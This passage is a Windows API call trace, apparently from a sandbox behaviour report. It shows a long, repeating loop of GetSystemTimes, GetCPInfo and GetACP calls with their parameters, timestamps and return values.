lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.832] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.832] GetACP () returned 0x4e4 [0130.832] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.832] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.832] GetACP () returned 0x4e4 [0130.832] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.833] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.833] GetACP () returned 0x4e4 [0130.833] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.833] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.833] GetACP () returned 0x4e4 [0130.833] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.833] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.833] GetACP () returned 0x4e4 [0130.833] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.833] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.833] GetACP () returned 0x4e4 [0130.833] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.833] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.833] GetACP () returned 0x4e4 [0130.833] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.833] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.833] GetACP () returned 0x4e4 [0130.833] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.833] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.833] GetACP () returned 0x4e4 [0130.833] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.834] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.834] GetACP () returned 0x4e4 [0130.834] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.834] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.834] GetACP () returned 0x4e4 [0130.834] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.834] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.834] GetACP () returned 0x4e4 [0130.834] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.834] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.834] GetACP () returned 0x4e4 [0130.834] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.834] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.834] GetACP () returned 0x4e4 [0130.834] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.834] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.834] GetACP () returned 0x4e4 [0130.834] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.834] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.834] GetACP () returned 0x4e4 [0130.834] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.834] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.834] GetACP () returned 0x4e4 [0130.834] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.834] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.834] GetACP () returned 0x4e4 [0130.834] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.835] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.835] GetACP () returned 0x4e4 [0130.835] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.835] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.835] GetACP () returned 0x4e4 [0130.835] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.835] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.835] GetACP () returned 0x4e4 [0130.835] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.835] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.835] GetACP () returned 0x4e4 [0130.835] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.835] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.835] GetACP () returned 0x4e4 [0130.835] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.835] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.835] GetACP () returned 0x4e4 [0130.835] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.835] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.835] GetACP () returned 0x4e4 [0130.835] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.835] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.835] GetACP () returned 0x4e4 [0130.835] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.835] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.835] GetACP () returned 0x4e4 [0130.836] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.836] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.836] GetACP () returned 0x4e4 [0130.836] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.836] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.836] GetACP () returned 0x4e4 [0130.836] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.836] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.836] GetACP () returned 0x4e4 [0130.836] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.836] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.836] GetACP () returned 0x4e4 [0130.836] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.836] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.836] GetACP () returned 0x4e4 [0130.836] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.836] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.836] GetACP () returned 0x4e4 [0130.836] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.836] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.836] GetACP () returned 0x4e4 [0130.836] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.836] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.836] GetACP () returned 0x4e4 [0130.836] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.837] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.837] GetACP () returned 0x4e4 [0130.837] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.837] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.837] GetACP () returned 0x4e4 [0130.837] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.837] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.837] GetACP () returned 0x4e4 [0130.837] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.837] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.837] GetACP () returned 0x4e4 [0130.837] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.837] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.837] GetACP () returned 0x4e4 [0130.837] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.837] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.837] GetACP () returned 0x4e4 [0130.837] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.837] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.837] GetACP () returned 0x4e4 [0130.837] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.837] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.837] GetACP () returned 0x4e4 [0130.837] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.837] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.837] GetACP () returned 0x4e4 [0130.837] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.838] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.838] GetACP () returned 0x4e4 [0130.838] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.838] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.838] GetACP () returned 0x4e4 [0130.838] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.838] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.838] GetACP () returned 0x4e4 [0130.838] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.838] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.838] GetACP () returned 0x4e4 [0130.838] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.838] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.838] GetACP () returned 0x4e4 [0130.838] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.838] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.838] GetACP () returned 0x4e4 [0130.838] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.838] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.838] GetACP () returned 0x4e4 [0130.838] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.838] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.838] GetACP () returned 0x4e4 [0130.838] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.838] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.839] GetACP () returned 0x4e4 [0130.839] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.839] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.839] GetACP () returned 0x4e4 [0130.839] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.839] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.839] GetACP () returned 0x4e4 [0130.839] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.839] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.839] GetACP () returned 0x4e4 [0130.839] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.839] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.839] GetACP () returned 0x4e4 [0130.839] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.839] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.839] GetACP () returned 0x4e4 [0130.839] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.839] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.839] GetACP () returned 0x4e4 [0130.839] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.839] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.840] GetACP () returned 0x4e4 [0130.840] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.840] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.840] GetACP () returned 0x4e4 [0130.840] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.840] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.840] GetACP () returned 0x4e4 [0130.840] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.840] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.840] GetACP () returned 0x4e4 [0130.840] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.840] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.840] GetACP () returned 0x4e4 [0130.840] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.840] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.840] GetACP () returned 0x4e4 [0130.840] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.840] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.840] GetACP () returned 0x4e4 [0130.840] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.840] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.840] GetACP () returned 0x4e4 [0130.840] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.840] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.840] GetACP () returned 0x4e4 [0130.841] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.841] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.841] GetACP () returned 0x4e4 [0130.841] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.841] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.841] GetACP () returned 0x4e4 [0130.841] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.841] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.841] GetACP () returned 0x4e4 [0130.841] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.841] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.841] GetACP () returned 0x4e4 [0130.841] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.841] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.841] GetACP () returned 0x4e4 [0130.841] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.841] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.841] GetACP () returned 0x4e4 [0130.841] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.841] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.841] GetACP () returned 0x4e4 [0130.841] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.841] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.842] GetACP () returned 0x4e4 [0130.842] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.842] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.842] 